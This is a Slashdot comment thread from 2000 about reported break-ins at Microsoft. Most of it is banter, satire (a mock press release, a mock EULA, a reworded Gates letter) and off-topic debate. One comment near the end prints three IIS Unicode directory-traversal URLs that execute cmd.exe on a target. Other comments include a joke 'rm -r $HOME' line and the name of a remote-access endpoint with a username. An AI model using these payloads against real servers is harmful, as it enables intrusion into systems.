Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!


Forgot your password?

Microsoft Cracked again? 185

Dominic writes: "Seems microsoft have been hacked (possibly) again, acording to infoworld." They don't seem to have a lot of evidence, but there's some interesting commentary related to this, and the earlier crack where the source code to Windows and Office was supposedly stolen (I'll believe that when I see it).
This discussion has been archived. No new comments can be posted.

Microsoft Cracked again?

Comments Filter:
  • It seems that with these hacks Microsoft is losing more than their renound ability to market and spin themselves around. Usually their Marketing does all the work and the technical side of their product is kept to a whisper. But now with these hacks their Admins are admitting their faults and it seems the marketing is coming back to "clarify" things so we the public don't panic.

    Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...
  • Microsoft advertise thier products as being "secure solutitions". Assuming Microsoft use thier own products, this is clearly a hypocritical statement, perhaps misleading.
    They also seem to have a complete disregard for the security of their products, allowing them to be made availiable in this way.
    Perhaps Microsoft should actually think about the problems this caused for them, and the problems is could quite easily cause for others, the consequences are most severe.
    Buck up your attitude?
  • yer.. few years ago people would have just said "who'd put windoze boxen on the net?!!" and that would be that.
  • Microsoft is a huge target for criminals who like to test doors. One of the senior Microsoft security dudes at last year's SAGE-AU conference [sage-au.org.au] let us know that there are at least 10,000 port scans, and about 300 more complex attacks conducted against Microsoft every week. The team is made up of about 10-20 people, and they have to provide 24x7 coverage. The triage each attack and deal with those that actually form a real threat to the organisation. They also conduct internal tiger team attacks to ensure they know about the holes before attackers do. Considering they have over 30,000 desktops and associated servers, this is a difficult and immense task. Very few non-finance companies take security this seriously.

    They are probably "cracked" on a regular basis, but because you don't hear about it, and so it remains a non-issue. As soon as a little event ends up in the news, this sort of silliness is the result. Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies. One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident. You hear about bank holdups all the time, but you'll never hear about real incidents of electronic fraud or Internet banking attacks, even though they occur every day somewhere on the planet.

    There are many companies that take a similar risk-managed approach to security. You classify assets based upon their worth to the organisation, and then you protect them to that value. Cracking into the machines that do "download.microsoft.com" is different to cracking into the corporate ERP system or the internal code repositories.

    With over 10,000 attacks a week, Microsoft takes a reasonable approach to security, in my opinion. No one can be 100% secure, and it costs so much to be near 100% secure that it's not worth doing so. If you don't agree with me, bite me. Unlike most of you, risk managed security architecture is what I do for a living.

  • The news agencies are probably not reporting it because they use Microsoft Windows and can't make themselves look bad to the public.
  • Since absolutely none of us know gates in real life (what do we all know of him? his company? his software? that shoddy movie "The Pirates of Silicon Valley"?), I have to agree with you. Yes, he's the world's richest man, and it would appear that he actually has some common sense and a conscious (s?).

    Too often on here I see the ignoramus posting about the evils of microsoft and Gates. I think its the same thing as penis envy...he's rich, he's got an amazingly successful company..and you dont. I'm no fan of the software quality myself, but I wont go about spouting how the CEO is evil. Thats just immature. I think Gates has proven himself a worthy human with all his donations. At least he's doing more than those other tech people who claim that computers can solve everything. You need to be able to eat decent food and clean water before you need a SystemTech PentiumProThlon 9000 w/ advanced graphics capabilities and altec lansing speakers. You need to solve starvation before planting a laptop in the hands of the poor.

  • It's hard to be a wealthy nation when all of your resources are being exported for dirt cheap and all your labor is being employed by foreigners.

    Well, by that standard then, nations like Cuba and Iraq ought to be paradises. The embargos keep us vicious foreign devils from looting them. So, why are they miserable pits of desperation and poverty?

    As for rule of law, that's very vague. If you mean the laws that allow only US-owned businesses to import and export food while depriving native farmers of implements and supplies, then I'd have to say you're wrong. If you mean establishing a minimum standard of living for the populace, I'd say you're right.

    No, I mean that you pass laws that permit people to keep the fruits of their labors and assure certain basic rights such as speech, assembly, voting, etc. and you make sure that you have a legal system that enforces those laws. Without corruption or cronyism.

    Your response betrays your mindset that for a nation to succeed, it must obtain the means to do so from outside. I maintain that that simply isn't true. The reason the West prospers is a result of its freedoms, laws, and capitalism. For a good example of what happens when you lose that, you need look no farther than South Africa. Once the economic jewel of the continent, it's gradually descending into a chaos of tribalism and corruption. Unchecked, it will ultimately be as impoverished as its neighbors.

  • I know, I just wonder how it could happen twice so close to each other, one should think that they would have a lot of attention on the subject after the first time.
    Of course if it was years ago, then most people would lower their guards and relax a bit because they needed a "wake-up-call".
    And it cant be easy to be a favorite hacking object.

  • > I haxored kernel.org and downloaded the linux source code

    That's nothing. I downloaded it, changed some things, and uploaded the changes!

    I even put my name in the files, so anyone else who downloads it will know I did it!

  • This is utter corporate fluff.

    "...The[y] triage each attack and deal with those that actually form a real threat to the organisation..."

    Even the most self-serving accounts of the previous crack says that the crackers were in for twelve days. M$ spun the story to say that they were watching the whole time; I don't believe that. Now *you* want us to believe that M$'s response team really focuses on attacks "...that actually form a real threat to the organization..."

    Nuts. They flat didn't even know the first one was happening for 'way too long.

    "...They also conduct internal tiger team attacks to ensure they know about the holes before attackers do..."

    That's all real fine-and-dandy for the hard-core threats -- but every account I've read says that M$ was compromised by an email attachment that:

    1) got into M$'s system in the first place

    2) was executable because M$'s own software design defaults to firing-off an email attachment by merely double-clicking on it..

    3) and finally, the M$ employee who did that hadn't even received the *most rudementary* training in protecting him/herself from such a brain-dead simple compromise

    "Tiger teams"?

    "Tiger teams" aren't going to do M$ any good; it's their own software and their own arrogance that did them in.

    To let you continue:

    "...Hopefully, you'll understand why most companies, including banks, are extremely reluctant to share information with the law enforcement agencies..."

    No, I don't, particularily given your outlandish rationalization:

    "...One simple little attack might take a company's value through the floor because investors don't understand the hoopla surrounding a security incident..."

    "One simple little attack..."?


    That's what any shareholder concern boils down to? God forbid that a company's shares fall in price because they can't manage to implement a comprehensive security system.

    And let's not worry the silly little investors about such trivia.

    "Hey! They invested in our company. How smart can they be?"

    I think not; therefore I ain't®

  • Your subject title is actually a very good answer to your question. Microsofts security system is not entirely Windows based - if you recall an aticle entitled `Unix at the Empire' a few months ago, or talk to those who have knowledge of MS internal security, there is a lot of ipfilter based OpenBSD firewalls.

    Though, as Microsoft are often in the habit of eating their own dog food, they might beusing their new Internet Security and Acceleration [ISA} Server, the replacement to shitty old proxy server. This eliminates much of the nastiness [and non-firewallness] of PS, and is about -3 months old. This incident would damage the launch severely is MS told anyone what they were using.

    I'd suspect, with regards to security, they do the testing in a closed environment for quite some time.

    But your point is nevertheless a good one - while we don't know what MS use internally, the habit of people calling Outlook Viruses `email viruses', when they only affect a specific client, is misleading.
  • Who cares? Prove it isn't a simple tax writeoff. I don't buy that the guy is Mother Teresa, or even has the interests of others at heart. Even in this he's out for himself- if nothing else, the amount of goodwill he got from _you_ was worth every penny- and in relation to his total wealth it _was_ the equivalent of a penny to most people.

    Sorry- having an open mind is great so long as your brain doesn't fall out. I think you've been spun. The guy's still the primary personality behind the totally unacceptable behavior of Microsoft, which has been _convicted_ of monopolistic crimes, the list of which is so long it'll make your head spin. Did they just do this at random? No, there was a pattern of 'search and destroy' and open attack of the capitalistic process coming right from the top there.

    If tossing a few nickels at charity can really make you forget that, you have a _short_ memory.

  • sure they could. i mean, people can sue other people (and win) for having a *tree* in their own garden that's "blocking [their] view", so why not something as serious as security?
  • breaking news! microsoft hires monty python to write the killer joke and embed it in the source code. avoid at all costs, it WILL kill you!
  • by paai ( 162289 ) on Sunday November 05, 2000 @09:52AM (#647589) Homepage
    What I do not understand is why so many people try to crack Microsoft itself. Yes, sure, you wave your manhood for everybody to admire its size, but...
    ... in the meantime you help actively to make the Microsoft-site the best-protected site in the world. Do you want that?
    So mess with the customers of Microsoft as much as you want, embarass them for the whole world, but leave Microsoft itself alone! There may come a time when it is desperately necessary to break into the Microsoft stronghold and *then* you want all those exploits wide open; not plugged.
  • a boy wanting to show off to his girlfriend:
    b: look at my machine
    g: wow, so much cables and so...
    b: i am a superhacker. i already hacked pentagon and nearly sent nukes on russians
    g: cool really? can you show something to me?
    b: sure look now i login to internet
    aolsoft: you've got mail
    [click click] [ftp://billg:linuxsuxx@microsoft.com]
    [rm -r $HOME]
    b: now i hacked microsoft!
    g: wow, you are my hero *kiss*
  • The idea that you need source code to find BO's if fucking stupid, and shows how little you know about being l33t.

    I know that you don't need the source code to find buffer overflows. I also know that of 1000 people who can find a buffer overflow by examining the source code, maybe 2 or 3 know how to use SoftICE or IDA to find the same exploit by working on the binary. So basically, although you are correct in that you don't need the source code, it makes it much more difficult for the average script kiddie to find it, and thus less likely that it will become public knowledge.

  • Even an accountant who has 6 terminals open into an IBM mainframe knows that it's Lopht, not Loft.

    Smells terribly fishy to me.

    "I don't want the cheese; I only want out of the trap."
  • by pirodude ( 54707 ) on Sunday November 05, 2000 @09:54AM (#647593)
    Most sites are cracked by exploting a script (perl, c, php) that resides on the server. And sometimes there is just human error, like forgetting to change a default password (*cough* slashdot *cough*)

  • Read this:
    http://www.observer.co.uk/international/story/0,69 03,393015,00.html [observer.co.uk]

    This single article reversed 180 degrees my opinion of Mr. Gates.
    I previously believed him to be a greedy, naieve, power-hungry egomaniac. If this article is accurate, and he will be giving away his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe slashdot should look into not portraying his as such an evil person. Maybe he has finally matured?

    (I know this goes completely against the conventional wisdom on Slashdot, but read the article, maybe submit it as a story here... show that even geeks can be open-minded)

    Open Source, Closed Minds. We are Slashdot.
  • by kodiar ( 226287 ) on Sunday November 05, 2000 @09:58AM (#647595)
    From a local paper: [jsonline.com]
    A ... network security consultant and expert on hackers, said that if a copy of the code was downloaded, the person who seized it may demand a ransom for its safe return. Or if the attacker was an "open-source vigilante," the hacker might release it on the Internet for everyone to enjoy. "They believe information wants to be free," he said. "And that Microsoft is the big, evil empire."
  • Then after, MS will say that the Open Office's source have the stolen MS Office source code and they will condamn anything that OpenSource is made from stolen source code and all the crap they normally say.
    Office source code was stolen? Yeah, sure!
  • That's funny, dammit!

    The moderator who modded the above post as "Troll" must be whacked with a cluestick, please!

    Quidquid latine dictum sit, altum viditur.
  • Teaching kids to code would cost money? Maybe if you are getting some phat ass wages at the moment and you would have to take time off to do it but I don't see why coder's can't donate some of their time to teach disadvantaged kids how to code. Sure, you'd have to fork em a pc or two, but it's a small donation and you'd probably take a cut of the contract work you get them.. oh wait.. there's that exploiting the third world thing again.. drat.
  • Have no fear: Billg is still the ``greedy, naive power-hungry egomaniac" we all know & love. And he's got a ring of folks around him who will do theri utmost to keep him that way. They check his computer daily to make sure he'll never see a BSOD, & assure him that he is the genius he thinks he is.

    After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.

    I just had a flashback to the old stories of Siddharta Gautama, who was shielded from death and decay by his royal advisors and parents. Once day upon seeing a sick man, a crippled man, a dead man, and a religious man, he realized how the world really was, and fled to live a religious life.

    Wow, I just compared Bill Gates to Buddha. I suddenly feel the need to go wash.

  • anyone with their heads on the outside of their ass has backups stuffed away somewhere physically separate from the servers, preferably on 2 or more locations.
  • by cfish ( 61161 )
    This is a hoax. The reason behind it was that Bill Gates watched "Charlie's Angel" yesterday...

    Bill went home and started calling every Charlie on the phone book to hire angels.
  • From Bill Gates' letter:

    The feedback we have gotten from the millions of people who say they are using LINUX has all been positive. Two surprising things are apparent, however, 1) Most of these "users" never bought LINUX (less than 10% of all PC owners have bought LINUX), and 2) The amount of royalties we have received from sales to hobbyists makes the time spent on LINUX worth less than $2 an hour.

    Why is this? As the majority of linux users must be aware, most of you steal your software. Hardware must be paid for, but software is something to share. Who cares if the people who worked on it get paid?

    Is this fair? One thing you don't do by stealing software is get back at Linus or Alan for some problem you may have had. RedHat doesn't make money selling software. The royalty paid to us, the manual, the tape and the overhead make it a break-even operation. One thing you do do is prevent good software from being written. Who can afford to do professional work for nothing? What hobbyist can put 3-man years into programming, finding all bugs, documenting his product and distribute for free? The fact is, no one besides us has invested a lot of money in hobby software. We have written Emacs, and are writing kernel 2.4, but there is very little incentive to make this software available to hobbyists. Most directly, the thing you do is theft.
  • If the events of the passed couple of weeks are any indication, I wouldn't worry too much. It doesn't seem like Microsloth is paying much attention to their security. People can probably keep (cr|h)acking them for quite some time without them responding. It could be a fun game.
  • and what are you doing?
  • (red herring: l0pht is incorrectly spelled "l0ft" in the article)

    Shouldn't l0phtcrack be just as "illegal" regarding Microsoft SAM encrypted password files as DeCSS is to DVDs?
  • With Nvidia "leaking" driver rev's so frequently maybe MS was hoping that one of these internal alpha/beta/final builds would solve everybody's problems. Maybe make windows run better then they would sieze on that and start putting that version of the code out as final :)


  • by Lostman ( 172654 ) on Sunday November 05, 2000 @09:30AM (#647607)
    "It's hard to give you an absolute certainty that the patch had been applied across the board. Given today's incident, our security teams are going back to check out the systems."

    This statement is particularly disheartening. When the problems with Microsoft Outlook Express and the "features" that allow virus's to spread have their only fix with these Patches, and that -- according to even Microsoft -- its hard to make sure that the patches our applied completely: we should worry.

    One might say that the little Microsoft Accessories should have been coded correctly the first time (before being published) but that is often a very hard thing to do.

    I am asking You All: What ways could we make sure that "patches" had been applied across the board?

  • thank you for proving that not EVERYBODY on here are zealots.
  • We know that no web server is immune to being cracked. Not because it's a Microsoft web server that it should be immune. They're using the same software as the other big web sites that have been cracked.
  • Christ's fat cock, neuneu.

    It was supposed to be funny.

  • Color me paranoid but I think microsoft is up
    to no good....Hacked twice in a couple of weeks?
  • Well, can't we just hack microsoft like this guys, and filter all code thru "c2pas" and have a GPL'd office filters in PASCAL!

    One can easily see that this code no longer belongs to microsoft since it's "rewritten from stratch"!

  • by Bad_CRC ( 137146 ) on Sunday November 05, 2000 @10:02AM (#647613)
    so Microsoft can claim any bugs were maliciously inserted by evil linux hackers who cracked into the network.


  • Funny. This article (about Bill Gates having a conscience) rather alarmed me even more. If mighty men suddenly develop a conscience, they may well go and try to better the world. This generally leads to greater evils than the ones they wanted to combat...
  • you mean L0pht, right? That's a zero, not an `o'.

  • Actually, its l0pht. Well, actually it's @Stake now. Or @Steak, if you want.

  • Safe return?

    What would he do, upload back to the MS ftp server? Maybe burn it to a disk and mail it to them?

  • *shrug*

    It's an improvement, at least. And he's right -- a lot of people would be helped more by basics like immunizations than, oh, Pocket PCs or e-mail.

    The NYT almanac puts the life expectancy for those born in '94 in Rwanda at 23; Sierra Leone and Mozambique at 34; Liberia at 39, and so forth. These people have more immediate concerns, like war, famine, pestilence and plague, that should take precedence over hypertext. Funding something like immunizations (which his Foundation does), or, say, GM grains engineered for high yield (dunno if it does), would help a bit more...
  • I am asking You All: What ways could we make sure that "patches" had been applied across the board?

    Tivoli for Linux (yes, it exists The Red Hat Update Agent (up2date) (when it works). [tivoli.com]

    A clueful admin.

    A clueful CIO.

  • Well, they were dumb enough to get hacked twice in the first place. They probably have their backup, on tape or cd somewhere in a fireproof safe in their building| like i do. I usually keep my server's backup in my basement, so if disaster hits, Ill get a jackhammer, and get to my backup on DVD disk. :)

    ETRN x
  • They switched to Solaris as a consequence of being cracked.
  • OT and all but don't use wu-ftpd, if they have problems(not really an if) use ProFTPd or something else.

  • I would still like to see a Boland compiler, being able to download a newer RealPlayer for Linux and being able to feel save of Peter Norotn's Apps. It's not just about being able to see Director in Linux... Flash would be nice. =)
  • GM grains engineered for high yield (dunno if it does)
    we already destory more food than we can eat
    food prices are kept artificially high to "stablize economies"
    GM crops lock farmers into buy seed grain rather than growing their own and also lock them into pesticide / herbicide models
    thus raping Africa once more
  • <TROLL>
    If you h4x0r3d it, could you please post the 2.4 source code?
    We've been waiting for it for soooo long...

  • And now they will release "Windows RT 2000 Secure Edition"

    RT - Russian Technology

  • Certainly the "Safe return" thing is funny. There's no way they could guarantee the code was deleted or anything.

    But the second bit... well, that's the attitude I sometimes see reading slashdot. I can see how it would be easy for media "outsiders" to make that assumption.
  • Microsoft reserves the right to terminate any user

    Now that's scary. I won't object termination of the license agreement, but sending death-squad to the user who peeked into M$ code seems to me a bit like over-reaction...
  • Let me guess... A few days from now the story will be cleared up as a minor breach and that no data was modified nor seen...

    already happened [infoworld.com].

  • > even though the patches are developed and tested in the same building

    .. You forgot to mention the bugs, which are also developed in the same building...

  • I am asking You All: What ways could we make sure that "patches" had been applied across the board?

    You could always add them to the payload of an email virus ;)

  • by ryanr ( 30917 ) <ryan@thievco.com> on Sunday November 05, 2000 @12:58PM (#647632) Homepage Journal
    I was given a copy of a small log that Dimitri shared with the IDG reporter. Egg.microsoft.com was not one of the servers mentioned.

    And yes, the exploit was nearly identical to one of the lines you mentioned above.

    (The IDG reporter said I couldn't share the log, sorry. Though it's possible that restriction might be gone now that the story has been published. The Infoworld story is a reprint of the IDG story that broke on Friday. Strangely enough, I didn't actually say the first sentence attributed to me in the article.)
  • by Lion-O ( 81320 )
    I've seen this so called hacker on a Dutch television show and he's more then pathetic. When security and such were a bit more popular he got invited to a television show in which he would show how easy it was to hack a website. The site being targeted was www.voetbal.nl [voetbal.nl]. Like I said it was more then pathetic; he claimed that he hacked it (during a commercial break) and when he wanted to show it it wasn't able to anymore. "They changed the password", he said. Yeah right; at 22:00 on a sunday someone is still working and immediatly changed the password in, say, 5 min. No, this is just your regular hacker wannabe who will try anything to "ride a wave" in order to get his name mentioned. Rememeber; "it doesn't matter how you talk about them as long as you are talking about them".
  • If the exploit is sufficienly high priority (and -- not to dig at Microsoft -- most Microsoft patches are high priority because of the length of time they take to release them and the likelihood that a real-world exploit already exists for them) there is only one way to be sure. Shut down access to everything that doesn't have it yet, and only bring it back online when it does.
  • Why is security such a complex problem? It seems like as long as one designs everything with the intention of specifically allowing certain activities (as opposed to specifically disallowing certain activities), then the only risks are human (i.e. having a password stolen, and so on).

    Is it basically because not enough people design software to be secure? Or because people tend to add new features without considering the security ramifications?

    Still, I don't see why being hacked is inevitable; at some point, software can be designed so that circumvention involves breaking underlying assumptions which must be true in order for your system to run at all. i.e. any crack would instantly disable your system, leaving it secure.

    As a sysadmin, you can't know every single line of every program that's on your system, but isn't this the point of OpenSource: that some people will be intelligent enough to design secure software, and that others can fix what little glitches they miss?

    You seem too pessimistic.

  • by Cid Highwind ( 9258 ) on Sunday November 05, 2000 @10:23AM (#647636) Homepage
    ...source code to Windows and Office was supposedly stolen (I'll believe that when I see it)

    Unfortunately, persuant to subparagraph J of section 3, chapter 13 of the Microsoft end-user license agreement (EULA), Microsoft reserves the right to terminate any user who comes in contact with the Windows source code.

    If you do recieve the code via email or any other means, you are required to unplug your computer, telephone, and television, close your eyes, cover your ears, and chant "la la la, I can't hear you". Failure to comply with these provisions that protect our intellectual property is a violation of the DMCA, and will result in the MS Death-Commando(tm) being dispatched to your location.

    We reserve the right to take legal action against anyone who has seen the aforementioned code, anyone who assisted in the theft of the code, anyone who made funny remarks about our IP protection measures, and anyone who found said illegal statements humourous. Stop lauging, we mean it
  • With security through obscurity (which is what you are using) security holes are only patched after they have been cracked, i.e. someone has gotten screwed because of it. With real security, where many people check the source code for holes because they're relying on the security (not trying to exploit it), holes are also patched when the 'good guys' find a hole.

    If you want to wait until someone gets cracked before a hole is patched in your security, go ahread - I'll use open source, thanks.
  • by xinit ( 6477 ) <(rmurray) (at) (foo.ca)> on Sunday November 05, 2000 @10:24AM (#647638) Homepage
    How's this for a conspiracy theory;

    Monday November 27, 9:00 am Eastern Time

    Press Release

    Microsoft Eliminates Security Problems related to Linux 'Hacker OS'

    Redmond, Wa--(BUSINESS WIRE)--Nov. 27, 2000--Microsoft Corp. (Nasdaq NMS: MSFT) today announced that it has discovered the reasons behind the recent web breakins that have plagued them, and since eliminated them.

    "We have been working for the past month performing an audit of all of our systems that could have been the source of the leak. We found that one of our corporate file servers had been replaced with one of those Linux boxes running Samba. Someone in our intranet development team thought that it would be a good way to keep his budget in line. Well, he knows better now, introducing an insecure free 'operating system' like that in our network - it's a career limiting move." stated Phil Todd, PR spokesperson for Microsoft.

    Phil goes on to describe how a malicious hacker was able to remotely cause the source code in the Linux Computer to send him the Confidential Windows Source Code (tm). Linux 'Kernel Hackers' as they call themselves often do this kind of modification in order to make corporate firewalls useless. "You just never know what is in those free systems. There's nobody you can sue if things go wrong!" Phil added incredulously.

    Microsoft has since removed the offensive machine and replaced it with a Real Windows 2000 File Server. "Sure, some people say it's slower this way, but they're just misinformed. At least it's SECURE."

    About Microsoft

    Founded in 1975, Microsoft (Nasdaq ``MSFT'') is the worldwide leader in software for personal computers and business computing. The company offers a wide range of products and services designed to empower people through great software -- any time, any place and on any device. Microsoft is a registered trademark of Microsoft Corp. in the United States and/or other countries. Other product and company names herein may be trademarks of their respective owners.

  • What won't help the Third World is overpriced, overly complex software like Windows, the glitzy and wasteful Web standards Microsoft has been promoting, and the enormously expensive hardware needed to run it all.

    But computers could be very useful helping the Third World solve its problems: computers can take much better advantage of limited bandwidth, they are better suited to store-and-forward or intermittent communications, and they can greatly simplify administrative processes and reduce costs. In health care and ecology alone, being able to track diseases and other events reliably is very important.

    Of course, for that to work, you need low end, low-cost, reliable, and simple computers, open and stable standards, and free software. Third world countries can gain tremendously from computers, but they won't be able to do so if they spend money as wastefully on frills and upgrades as US corporations seem to be all too willing to do.

  • As long as humans are designing software, it's going to reach a complexity where not all use-cases can be considered. Therefore, there is the highest chance that some flaw will creep in. And then, since the number of people trying to discover that flaw in order to abuse it is always going to exceed the number of people looking for flaws to fix, the situation will continue. We've had, say, 20 years of cracking - no reason to assume it's going to stop now.

    --Remove SPAM from my address to mail me
  • I realize that this is somewhat inflammatory, but I feel like it should be asked. I am not a programmer, and have the utmost respect for anyone who is capable of writing something like wine, but: Is that really a loss to the Free Software community? Is there any real use for wine except to run proprietary software under Linux? Does this not further our addiction to proprietary software (most notably that heinosity known as "Office") by reducing the imperative to create Free alternatives? Does this not endanger Free alternatives by extending the marketshare of proprietary applications (in that, Office users can now legitimately carp to Linux users that all work should be done in Office since it runs on wine)?
  • I am being serious here, but at the same time, I know that I am being paranoid.

    Microsoft has ties with several people in the government. Good ties. Friendships, so to speak. All of these recent hacker attempts seem a little fishy to me. Why all of the publicity, all of a sudden? Why the big stink?

    The USA government wants to pass even more restrictive internet and computer laws... laws which will be passed in the name of security, yet at the same time, killing our necessary personal freedoms - our rights.

    Bush and Bill are buddy-buddy. Microsoft will hold out on seeing the Supreme Court until Bush has become prez and has appointed new Justices. Microsoft will get a slap on the wrist. Our government will then apply god-awful amounts of regulation to the computer industry...

    So, yes, I am being paranoid, but it all seems so obvious to me. Let's just hope that I am wrong, and next year, I am NOT saying "I told you so."
  • Is that supposed to be sarcastic?

    Try reading my .sig ya clam
  • While all you say may be true, some guy going by Dimitri did hack a couple of MS servers using the Unicode hole. Not a terribly impressive hack, but he tracked down a couple of MS servers that were vulnerable, and placed a couple of files.
  • When they were "cracked" last week, the stock rose a few bucks. Of course they got cracked again!
  • What is a very good way for M$ to stop wine, or at least discourage people from working on it? Create a situation where they can feasibly claim that code in it just might be stolen or that the people who wrote it had access to Windows source code. Whether they did or not is irrelevant, the fact that you can cause legal problems for them simply based on the idea that they might have is what matters. If I were a ruthless organization bent on world domination (like microsoft or $cientology), this is exactly what I would do.

    Expect to see legal roadblocks in the future for wine.


  • As I understand it, UCITA allows software companies to remotely disable software (almost) at will. If companies go for this (well they got the law passed for a reason), this could mean that hacking into a company such as M$ would give access to the programs / codes / whatever to shut down any of that company's software on any customer's site (assuming they're connected to the net).

    Now that would be scary.

    I bet the politicians behind UCITA didn't think of that.
  • by xee ( 128376 ) on Sunday November 05, 2000 @10:40AM (#647665) Journal
    Notice how no news agency that has reported the recent cracks has equated the security flaws in Microsoft's network and servers to Microsoft's Windows operating system. No news agency is suggesting that "if you use windows, you could be next", as they often do with other reports. "Man dead after drinking poisoned orange juice... Find out if your orange juice could be poisoned - tonight at 10." Why is it that the news media is not running their usual tricks to scare the populace? In my (not ever humble) opinion, everyone running Windows is running the risk of their network/servers being cracked.

  • by Anonymous Coward

    Microsoft's internal network is made up of many separate domains (and Active Directory forests). The Houston domain is used exclusively for Microsoft's online properties (MSN.com, Microsoft.com, etc...) and has no privileges in Microsoft's primary domain, REDMOND.

    BTW: You can PPTP into Microsoft at cxn-redmond.microsoft.com. (However, they took it down recently because of these security problems.) Username: REDMOND\billg; Password: ????

    > I previously believed him to be a greedy, naive, power-hungry egomaniac. If this article is accurate, and he will be giving away
    > his money for food and medicine instead of for computers (which are pretty useless if you don't have anything to eat) then maybe
    > slashdot should look into not portraying him as such an evil person. Maybe he has finally matured?

    For the last couple of years (perhaps under the influence of his wife Melinda, perhaps not), Gates has been throwing money at various philanthropic targets. We're talking serious stuff like money to help homeless youth in the US Northwest, or to fund school programs in low-income school districts.

    Does this mean he has gained a conscience? No, he's always demonstrated signs that his political views are left of center; it's something of a hold-over from growing up in Seattle. I'd say his own political views are best described as a ``limousine liberal." He is eager to throw money at ``good" causes, but has never thought about how much money he made by causing problems that need to be addressed by those ``good" causes. He is eager to give millions to provide drugs for Africa, but does not understand that Africa does not have the money to buy computer software at $50-- a pop. (MS Office being extra.)

    Have no fear: Billg is still the ``greedy, naive power-hungry egomaniac" we all know & love. And he's got a ring of folks around him who will do their utmost to keep him that way. They check his computer daily to make sure he'll never see a BSOD, & assure him that he is the genius he thinks he is.

    After all, if he realized just how bad things truly were, & how much he could have done to prevent those bad things, he'd also see that they were nothing more than a band of toadies & parasites, & be out on the street without stock options or job prospects.

  • by zelyan ( 222028 ) on Sunday November 05, 2000 @11:22AM (#647673)
    And in other news today, a politician lied, astronomers discovered an asteroid that has a 1000-to-1 chance of hitting Earth, and the Napster suit is still ongoing. Industry experts expect that the stock market will continue existing and the dot-coms "might go up, might go down, nobody really knows why they do anything, anyway" said one macro economist.

    President Clinton could not be reached for comment, but Governor and Presidential candidate George W. Bush said "that's the way the cookie jar crumbles." No, we don't know what he was talking about either.


  • He doesn't want to believe he threw his money away on garbage.

    MS has no incentive in the marketplace to improve their software. Maybe bringing it home to them, by showing them how bad their security is, will force them to make a better product. I doubt it though.

    I worked in a bike shop for a few years. One man kept bringing in his bike to repair flats. He had about ten patches on his tires. It would have been cheaper to buy a heavy-duty inner tube and thorn scrapers, than to have it repaired over and over again, but he kept that leaky old inner tube.
  • Free software is limited by one important issue, who is going to do the coding and who is going to use the product coded? The vast majority of free software is created by people because they use it themselves. But there are also other areas where the people who have the talent to write the code have no interest in using the end product. Here proprietary solutions will continue to dominate.

    I don't know about you, but I really don't care whether my word processor is freeware or commercial. I want the underlying operating system to be free, or at least have all its specs published in full. Linux is great not so much because it is free of charge, but because there aren't any secrets about it. With windows there are lots of secrets. With the MacOS there are even more. But with Linux everything is right there on the table and its got a complete development environment included to boot! Talk about a hackers (!cracker) dream come true!

    In short, the open source/free software model is one that works in some areas. It does not work for all. Therefore it is not going to take over the world. Twenty years from now commercial software will be just as prevalent as it is right now, if not more prevalent. There is every chance that free software might not be successful in the long run. There is also every chance that it will be successful. But there is nearly zero chance that it will overtake every other development model.

    I personally think wine is the greatest thing since Linux itself. Imagine a terminal server type system based off wine? M$'s own terminal server is severely limited by the poor multi-user performance of NT. Unlike Linux and virtually any other version of Unix, it is very easy for a single user to eat up all the resources and lock out everyone else. This is a serious problem, but one that wine does not share. It wouldn't be too hard to make wine into one kick ass terminal server / Citrix MetaFrame style system.

    I'm looking forward to bigger and better things from wine.


  • They did not actually switch to Solaris - they use NT for the front-end servers off an Oracle back-end database running a Sun Solaris server.

    The reason is that they find it easier to do rapid application development on the Windows machines. So in theory they can keep their back-end solid via Unix while having the development tools on an easily mastered platform.

    Personally, I think running the whole thing on Solaris would have been easier, but that is/was their rationale.


  • Same company, though. It's surely the Microsoft philosophy as a whole that makes their servers vulnerable.

  • I think it's incredibly naive of you to even suggest that computers are the solution to the problems of the third world. Sure they may play a minor role in helping third world countries manage limited resources, but putting them in classrooms? You're talking about the affordability of software when these people don't have the basic necessities of life?

    Turn off your computer, go outside, take a long pleasant walk, contemplate, and don't log back in till you realise there is more to the world than 1's and 0's.

    Third world countries need food, water, shelter and peace NOT computers. Regardless, this is getting way off topic; I would really like to see that article posted in its own thread. Would be interesting to see if the /. crowd is as open minded as it thinks it is.

  • by flikx ( 191915 ) on Sunday November 05, 2000 @10:47AM (#647694) Homepage Journal
    > MS server software is, out of the box, full of security holes and downright dangerous to put on the Net without extensively patching them first, and

    In the past, I had to keep up on patching default Mandrake Linux 7.0 installs just to make sure that I didn't get owned by a wu-ftpd site-exec kiddie. Installing any OS requires keeping on top of things when you admin a server(s)... Micro$~1 makes sure that you have more to do to keep your servers "secure".

    First thing I do after installing any OS is find any security info I can and apply the related fixes.

  • Talk is cheap, and one of the world's richest men is merely talking.
  • Remember, just a couple of weeks ago, when there was a story posted informing us slashdot was hacked and we all needed to come up with new passwords?

    Besides that, the highest profile linux sites aren't anywhere near as popular or hated as Microsoft's sites. If linux made more enemies, I'm sure we'd see more concerted efforts to break it. Of course we'd get patches within hours, days or weeks of each exploit. But the point is, because Microsoft is almost so universally disliked by hackers, they go out of their way breaking Microsoft's products, rather than expend that same effort on free software.
  • Unfortunately, the actual EULA for Windows 98 doesn't say anything about source code. However, it does say this:

    * Termination.
    Without prejudice to any other rights, Microsoft may terminate this EULA if you fail to comply with the terms and conditions of this EULA. In such event, you must destroy all copies of the SOFTWARE PRODUCT and all of its component parts.

    Sounds fun. [aol.com]

  • by Anonymous Coward
    The real impact here is what this does to MS as a service vendor. At a time when system software is quickly joining hardware in the "commodity" category, services are becoming ever more important to companies as a revenue source. If MS can't even secure their own servers, how can they possibly claim to be able to do so for clients?
  • by x-empt ( 127761 ) on Sunday November 05, 2000 @09:34AM (#647706) Homepage
    I am willing to bet this "hacker" owned egg.microsoft.com, which was not patched. It took them a few days to take it down and it still is offline.

    He was not a "hacker"; he just created one of the unicode URLs that got parsed incorrectly by IIS. No skill.

    http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
    http://target/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
    http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
